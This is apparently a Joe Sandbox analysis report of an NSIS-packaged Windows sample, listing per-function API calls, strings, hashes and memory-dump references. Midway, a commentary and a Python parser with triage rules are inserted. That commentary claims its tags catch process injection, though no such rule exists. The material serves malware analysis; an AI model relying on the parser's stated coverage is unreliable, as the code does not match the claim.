• Instruction ID: 66908bbe9354c3b59104e874c770ae4161d9466efedc1f742b63756e9967f80f
• Opcode Fuzzy Hash: b07bb42a36a53ac2b652948ec131e563e6f6be8de0f89c4bf93d81cf64cebf1f
• Instruction Fuzzy Hash: 54319E71900128ABCF21AFA5CE49D9E7E79AF44364F10423AF514762E1CB794C429FA8
Uniqueness
Uniqueness Score: -1.00%

APIs
• RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F02
• RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F4E
• RegCloseKey.ADVAPI32(?,?,?), ref: 00402F57
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F6E
• RegCloseKey.ADVAPI32(?,?,?), ref: 00402F79
Memory Dump Source
• Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: CloseEnum$DeleteValue
• String ID:
• API String ID: 1354259210-0
• Opcode ID: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
• Instruction ID: 48bf034c557530f45265713f896c64b121a5f1f2f5b25ab6521791cb913d5ed3
• Opcode Fuzzy Hash: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
• Instruction Fuzzy Hash: 74215A7150010ABFDF119F90CE89EEF7B7DEB54388F110076B949B11A0D7B49E54AA68
Uniqueness
Uniqueness Score: -1.00%

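The per-function records above are the raw material for separating installer boilerplate from payload code: the record whose strings include "verifying installer: %d%%" (with MulDiv computing a percentage and SetDlgItemTextW updating a dialog) matches the self-check progress text of an NSIS installer stub, while the RegEnumValueW/RegEnumKeyW/RegDeleteKeyW loop is the recursive key-removal helper such a stub carries. As an added example that is not part of the Joe Sandbox report or its tooling, the script below parses records in this layout into structured objects and tags them with constructed triage rules (the rule table, the API_RE/STRING_RE regexes and the SAMPLE text are my own; SAMPLE is constructed from the two records just mentioned, trimmed to the fields the parser reads):

```python
"""Parser for Joe Sandbox per-function analysis records (added example).
Each record lists the Win32 APIs one function calls, the strings it uses,
similarity IDs / fuzzy hashes and a uniqueness score.  SAMPLE is constructed
from the report's layout so the module runs offline."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

SAMPLE = """\
APIs
• RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F02
• RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F4E
• RegCloseKey.ADVAPI32(?,?,?), ref: 00402F57
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F6E
• RegCloseKey.ADVAPI32(?,?,?), ref: 00402F79
Similarity
• API ID: CloseEnum$DeleteValue
• String ID:
• Instruction Fuzzy Hash: 74215A7150010ABFDF119F90CE89EEF7B7DEB54388F110076B949B11A0D7B49E54AA68
Uniqueness Score: -1.00%

APIs
• SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB6
• wsprintfW.USER32 ref: 00402FF1
• SetDlgItemTextW.USER32(?,00000406,?), ref: 00403013
Strings
• verifying installer: %d%%, xrefs: 00402FEB
Similarity
• API ID: Text$ItemTimerWindowwsprintf
• String ID: verifying installer: %d%%
Uniqueness Score: -1.00%
"""

BULLET = "•"
# Name.MODULE(args), ref: addr -- the argument list is absent for some calls.
API_RE = re.compile(r"^(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?"
                    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
STRING_RE = re.compile(r"^(?P<text>.*?),\s*xrefs:\s*(?P<ref>[0-9A-Fa-f]+)$")
SCORE_RE = re.compile(r"^Uniqueness Score:\s*(?P<score>-?\d+(?:\.\d+)?)%$")

@dataclass
class ApiCall:
    name: str
    module: str
    args: Optional[List[str]]  # None when the report shows no argument list
    ref: int                   # call-site virtual address

@dataclass
class FunctionRecord:
    apis: List[ApiCall] = field(default_factory=list)
    strings: List[Tuple[str, int]] = field(default_factory=list)  # (text, xref)
    similarity: Dict[str, str] = field(default_factory=dict)
    uniqueness_score: Optional[float] = None

def parse_records(text: str) -> List[FunctionRecord]:
    """Split report text into records; each record starts at an 'APIs' header."""
    records: List[FunctionRecord] = []
    rec: Optional[FunctionRecord] = None
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith(BULLET):
            if rec is None:          # bullet before the first record: ignore
                continue
            body = line[len(BULLET):].strip()
            if section == "APIs" and (m := API_RE.match(body)):
                args = m.group("args")
                rec.apis.append(ApiCall(m.group("name"), m.group("module"),
                                        None if args is None else args.split(","),
                                        int(m.group("ref"), 16)))
            elif section == "Strings" and (m := STRING_RE.match(body)):
                rec.strings.append((m.group("text"), int(m.group("ref"), 16)))
            elif section == "Similarity":
                key, _, value = body.partition(":")
                rec.similarity[key.strip()] = value.strip()
            continue
        if rec is not None and (m := SCORE_RE.match(line)):
            rec.uniqueness_score = float(m.group("score"))
            continue
        if line == "APIs":
            rec = FunctionRecord()
            records.append(rec)
        section = line
    return records

# Constructed triage rules: API sets that make a function worth a closer look.
TRIAGE_RULES = {
    "registry-delete": {"RegDeleteKeyW", "RegDeleteKeyA", "RegDeleteValueW", "RegDeleteValueA"},
    "file-delete": {"DeleteFileW", "DeleteFileA"},
    "ui-progress": {"SetTimer", "SetDlgItemTextW", "SetWindowTextW"},
}

def triage(rec: FunctionRecord) -> List[str]:
    """Tags from TRIAGE_RULES whose API set intersects the record's API calls."""
    names = {c.name for c in rec.apis}
    return sorted(tag for tag, apis in TRIAGE_RULES.items() if names & apis)

def find_callers(records: List[FunctionRecord], api_name: str) -> List[int]:
    """Call-site addresses of api_name across every record, in report order."""
    return [c.ref for r in records for c in r.apis if c.name == api_name]
```

Run it on the full report text to get one FunctionRecord per function, then pivot on the API ID / Instruction Fuzzy Hash fields to cluster records across samples; the ref addresses let you jump straight to the call sites in IDA or Ghidra, and the triage tags pick out the handful of functions (registry and file deletion, process injection) that deserve manual review over the dialog and progress-bar plumbing.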
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetDlgItem.USER32(?,?), ref: 00401D9F
                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 00401DEA
                                                                                                                                                                                          • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E1A
                                                                                                                                                                                          • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E2E
                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00401E3E
                                                                                                                                                                                          Memory Dump Source
• Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: ClientDeleteImageItemLoadMessageObjectRectSend
• String ID:
• API String ID: 1849352358-0
• Opcode ID: b4553b6f8f96a3615d4cb1d74016621c3cb3daa09826911c1e5c071ec9b0e61c
• Instruction ID: 002387d4b88dbb62f40c54eb0dee3f9a721ef30fc2dbb8ae50818b7fec09efb0
• Opcode Fuzzy Hash: b4553b6f8f96a3615d4cb1d74016621c3cb3daa09826911c1e5c071ec9b0e61c
• Instruction Fuzzy Hash: 0F21F872A00119AFCB15DF98DE45AEEBBB5EB08304F14003AF945F62A0D7789D41DB98
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetDC.USER32(?), ref: 00401E56
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E70
• MulDiv.KERNEL32(00000000,00000000), ref: 00401E78
• ReleaseDC.USER32(?,00000000), ref: 00401E89
• CreateFontIndirectW.GDI32(0040CDC8), ref: 00401ED8
Similarity
• API ID: CapsCreateDeviceFontIndirectRelease
• String ID:
• API String ID: 3808545654-0
• Opcode ID: 12fc5c0feb0b51e7a773ba9164babbc76b3b82788c0ea370a0f868ab0e4caa48
• Instruction ID: 1c21784e8a12ec6bf8935da156a17e2c336e66cb5fe6e154f3a2125ab74843e9
• Opcode Fuzzy Hash: 12fc5c0feb0b51e7a773ba9164babbc76b3b82788c0ea370a0f868ab0e4caa48
• Instruction Fuzzy Hash: 5A018871954240EFE7015BB4AE9ABDD3FB5AF15301F10497AF141B61E2C6B90445DB3C
Uniqueness
• Uniqueness Score: -1.00%

APIs
• SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB8
• SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CD0
Strings
Similarity
• API ID: MessageSend$Timeout
• String ID: !
• API String ID: 1777923405-2657877971
• Opcode ID: 0b60248b2d317c3fadb7ed9affa728e8142f9e62085aaabdbec9824b10747ad3
• Instruction ID: dc9a0f57bab323a5eda2152a626e9899419b02716f24503a8b80c8a4184e75e9
• Opcode Fuzzy Hash: 0b60248b2d317c3fadb7ed9affa728e8142f9e62085aaabdbec9824b10747ad3
• Instruction Fuzzy Hash: E921AD71D1421AAFEB05AFA4D94AAFE7BB0EF84304F10453EF601B61D0D7B84941CB98
Uniqueness
• Uniqueness Score: -1.00%

APIs
• lstrlenW.KERNEL32(00422F08,00422F08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DEE
• wsprintfW.USER32 ref: 00404DF7
• SetDlgItemTextW.USER32(?,00422F08), ref: 00404E0A
Strings
Similarity
• API ID: ItemTextlstrlenwsprintf
• String ID: %u.%u%s%s
• API String ID: 3540041739-3551169577
• Opcode ID: 808c56ceb77bc8fa6bb0a4fcfba6dc4e55d7e9e185af3d36fc5e6f51395c7837
• Instruction ID: 33e626053c854acaf0ea976fdeb40ece7b69d158cb37adfcb571004cb6629101
• Opcode Fuzzy Hash: 808c56ceb77bc8fa6bb0a4fcfba6dc4e55d7e9e185af3d36fc5e6f51395c7837
• Instruction Fuzzy Hash: 2C11EB7360412877DB00666DAC46EAE329DDF85334F250237FA66F31D5EA79C92242E8
Uniqueness
• Uniqueness Score: -1.00%

APIs
• lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004034E9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00405DF6
• CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004034E9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00405E00
• lstrcatW.KERNEL32(?,0040A014), ref: 00405E12
Strings
• C:\Users\user\AppData\Local\Temp\, xrefs: 00405DF0
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                          • API String ID: 2659869361-3081826266
                                                                                                                                                                                          • Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                                                                                                                                                          • Instruction ID: dcf52917e326d6ada13c2a72ecce68a7b96b6e8782615359caad44c872c99b85
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                                                                                                                                                          • Instruction Fuzzy Hash: EBD05EB1101634AAC2116B48AC04CDF62AC9E86704381402AF141B20A6C7785D6296ED
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • DestroyWindow.USER32(00000000,00000000,004031FC,00000001), ref: 00403031
                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 0040304F
                                                                                                                                                                                          • CreateDialogParamW.USER32(0000006F,00000000,00402F98,00000000), ref: 0040306C
                                                                                                                                                                                          • ShowWindow.USER32(00000000,00000005), ref: 0040307A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2102729457-0
                                                                                                                                                                                          • Opcode ID: 1f524868e2ec5e9a115d67c2f52ec07950574c6e8f58c79c8196e6c31eccfe04
                                                                                                                                                                                          • Instruction ID: fc94ebd698381dfc42c8ec832a7b78cf8da54aaf5e1058e2af7a384a9ccf94d3
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f524868e2ec5e9a115d67c2f52ec07950574c6e8f58c79c8196e6c31eccfe04
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0FF05471602621ABC6306F50BD08A9B7E69FB44B53F41087AF045B11A9CB7548828B9C
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00406521: lstrcpynW.KERNEL32(?,?,00000400,0040366E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040652E
                                                                                                                                                                                            • Part of subcall function 00405E9B: CharNextW.USER32(?,?,00425710,?,00405F0F,00425710,00425710,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00434000), ref: 00405EA9
                                                                                                                                                                                            • Part of subcall function 00405E9B: CharNextW.USER32(00000000), ref: 00405EAE
                                                                                                                                                                                            • Part of subcall function 00405E9B: CharNextW.USER32(00000000), ref: 00405EC6
                                                                                                                                                                                          • lstrlenW.KERNEL32(00425710,00000000,00425710,00425710,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00434000), ref: 00405F51
                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(00425710,00425710,00425710,00425710,00425710,00425710,00000000,00425710,00425710,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 00405F61
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405EF8
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                          • API String ID: 3248276644-3081826266
                                                                                                                                                                                          • Opcode ID: db39f955a116f1e539d990513461dc7a207fa728de065fffbfa736c70f2b9a34
                                                                                                                                                                                          • Instruction ID: 4f97f4adca9055af25af7ef058e1e83d315c20be799ec2f088cafe79a8eb74c9
                                                                                                                                                                                          • Opcode Fuzzy Hash: db39f955a116f1e539d990513461dc7a207fa728de065fffbfa736c70f2b9a34
                                                                                                                                                                                          • Instruction Fuzzy Hash: DAF0F435115E5326D622323A2C49AAF1A05CEC2324B55453FF891B22C2DF3C89538DBE
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • IsWindowVisible.USER32(?), ref: 00405549
                                                                                                                                                                                          • CallWindowProcW.USER32(?,?,?,?), ref: 0040559A
                                                                                                                                                                                            • Part of subcall function 004044EC: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044FE
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3748168415-3916222277
                                                                                                                                                                                          • Opcode ID: 8a6e7ab2b2ebc920f12c2d5b2b2096f2e9954bb0ec9a095f665350d4b71d8349
                                                                                                                                                                                          • Instruction ID: 85372f17a9103eb01fcdfd8a19690b8d052d76dd043ca16804f8a0d8951f02ed
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8a6e7ab2b2ebc920f12c2d5b2b2096f2e9954bb0ec9a095f665350d4b71d8349
                                                                                                                                                                                          • Instruction Fuzzy Hash: 53017171200609BFDF309F51DD80AAB362AFB84750F540437FA047A1D5C7B98D52AE69
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,00000800,00000000,?,?,?,?,: Completed,?,00000000,00406660,80000002), ref: 00406435
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00406440
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: CloseQueryValue
• String ID: : Completed
• API String ID: 3356406503-2954849223
• Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
• Instruction ID: 441e6d046e2572fd66e4c77006f0a98464fe89a944563537cf106c849ea921cc
• Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
• Instruction Fuzzy Hash: 4F017172500209ABDF218F51CD05EDB3BA9EB54354F01403AFD1992191D738D968DF94
Uniqueness
• Uniqueness Score: -1.00%

APIs
• FreeLibrary.KERNEL32(?,74DF3420,00000000,C:\Users\user\AppData\Local\Temp\,00403B36,00403A4C,?,?,00000008,0000000A,0000000C), ref: 00403B78
• GlobalFree.KERNEL32(00000000), ref: 00403B7F
Strings
• C:\Users\user\AppData\Local\Temp\, xrefs: 00403B5E
Memory Dump Source
• Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: Free$GlobalLibrary
• String ID: C:\Users\user\AppData\Local\Temp\
• API String ID: 1100898210-3081826266
• Opcode ID: 628ac1cb43285a1a84ac4c7f875ed8910a03c7a164280e3efa8a6a131abbe062
• Instruction ID: 6899552f53244e150386b1952d758f3f927a5bb415edc3c38dc9ad64461d36a3
• Opcode Fuzzy Hash: 628ac1cb43285a1a84ac4c7f875ed8910a03c7a164280e3efa8a6a131abbe062
• Instruction Fuzzy Hash: 59E08C3250102057CA211F05ED04B1AB7B8AF45B27F06452AE8407B26287B42C838FD8
Uniqueness
• Uniqueness Score: -1.00%

APIs
• lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030EE,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00405E42
• CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030EE,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00405E52
Strings
Memory Dump Source
• Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: CharPrevlstrlen
• String ID: C:\Users\user\Desktop
• API String ID: 2709904686-224404859
• Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
• Instruction ID: eba18341e72c17137544591cfc51a7e4cac6184970473274e9d14fc4341c5a90
• Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
• Instruction Fuzzy Hash: 29D0A7F3400A30DAC3127708EC00D9F77ACEF16700746443AE580A7165D7785D818AEC
Uniqueness
• Uniqueness Score: -1.00%

APIs
• lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F86
• lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405F9E
